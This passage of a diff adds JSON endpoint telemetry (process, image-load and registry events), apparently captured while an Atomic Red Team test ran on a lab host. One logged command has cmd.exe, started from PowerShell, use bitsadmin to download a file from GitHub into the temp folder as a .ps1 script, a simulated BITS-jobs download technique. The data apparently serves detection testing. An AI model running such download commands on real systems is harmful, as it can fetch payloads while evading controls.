}, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8152, + "process_name": "cmd.exe", + "process_path": 
"C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570875110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8152, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570875110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8152, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570875110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8152, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570875110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" + }, + { + "event_type": "process", + "pid": 8152, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570875110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %%TEMP%%\\bitsadmin_flag.ps1\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2108, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570876240000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}", + "unique_ppid": 
"{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2108, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570876210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2108, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570876210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2108, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570876210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2108, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570876210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2108, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570876210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" + }, + { + "command_line": "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Users\\bob\\AppData\\Local\\Temp\\bitsadmin_flag.ps1", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + 
"parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5868, + "ppid": 2108, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "subtype": "create", + "timestamp": 131883570876330000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}", + "unique_ppid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + 
"timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": 
"C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "bitsadmin.exe", + "image_path": "C:\\Windows\\System32\\bitsadmin.exe", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876360000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 5868, + 
"process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570876520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876680000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 
